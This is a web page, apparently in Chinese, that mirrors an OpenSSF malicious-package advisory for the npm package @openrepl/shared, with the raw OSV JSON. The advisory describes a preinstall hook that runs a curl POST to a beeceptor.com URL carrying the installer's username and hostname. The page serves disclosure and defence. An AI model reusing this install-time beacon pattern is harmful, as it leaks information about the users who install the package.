目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%
← 返回恶意软件包
npm active

@openrepl/shared

MAL-2026-14057
2026-08-15 16:10:01
OpenSSF Malicious Packages
该软件包被识别为恶意包。建议隔离受影响环境,并排查凭据泄露和异常网络连接。

Summary

Malicious code in @openrepl/shared (npm)

安装阶段执行文件/数据外传
AI 分析整理qwen3.6
基于上游报告生成,请以下方原始证据为准。
公开使用量数据
统计周期
last-week
下载量
数据源
npmjs.org
下载量只代表仓库活动度,不等于已被入侵的安装数量。
受影响版本
EcosystemPackageVersion
npm@openrepl/shared0.0.4
npm@openrepl/shared0.0.5
恶意行为说明OpenSSF OSV
上游来源证据
展开原始 OSV JSON
{"modified":"2026-08-15T16:10:01Z","published":"2026-08-15T15:58:33Z","schema_version":"1.7.4","id":"MAL-2026-14057","summary":"Malicious code in @openrepl/shared (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (2fcd297122e7aac00cd0d3d92fcb5f1fc00b6c558571a037b5447eb64bd443b8)\npackage.json declares a preinstall hook (`node index.js`) that runs automatically on `npm install`. index.js shells out via `child_process` to execute `curl -X POST` against `https://youjoex.free.beeceptor.com/$(whoami)/$(hostname)`, embedding the installer's OS username and hostname (captured via command substitution) in the URL path. beeceptor.com is a public request-inspection service commonly used as a low-effort exfiltration sink. The package advertises no functionality that would justify this network beacon and ships no other library code consistent with its `shared` name.\n","affected":[{"package":{"ecosystem":"npm","name":"@openrepl/shared"},"versions":["0.0.5","0.0.4"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"evidence_files":[{"path":"index.js","sha256":"95f3a06183c1303e12e3c4914662eb3d9fdd74911212724a83442b7ce0009c29","tlsh":"4ee0720a5cf9483a327218a4e908181f7b4bca00023bf082dc8a082013d886882281e3"}],"package_integrity":[{"filename":"shared-0.0.5.tgz","hashes":{"sha1":"cff64d50a45e2f0e50babffdd68c896092c2af6d","sha512_sri":"sha512-LCpOC9M9P3ub8SF6MDp83qcAkp9QbBU41C/hATKpSGTU7hqe8fMQYu71WQ8lOzBKyQI1EDH3Ye3CHM+VXajODg=="}}]}}}],"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@openrepl/shared/v/0.0.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@openrepl/shared/v/0.0.4"}],"credits":[{"name":"Amazon Inspector","type":"FINDER","contact":["inspector-research@amazon.com"]}],"database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-017965","import_time":"2026-08-15T16:07:57.008737654Z","modified_time":"2026-08-15T15:58:33Z","sha256":"2fcd297122e7aac00cd0d3d92fcb5f1fc00b6c558571a037b5447eb64bd443b8","source":"amazon-inspector","versions":["0.0.5"]},{"id":"IN-MAL-2026-017966","import_time":"2026-08-15T16:07:57.086040823Z","modified_time":"2026-08-15T15:58:40Z","sha256":"aabd8862a4910812bd95dde0681670548ea04386d70674032057229927497e12","source":"amazon-inspector","versions":["0.0.4"]}]}}

数据来源:OpenSSF Malicious Packages · Apache-2.0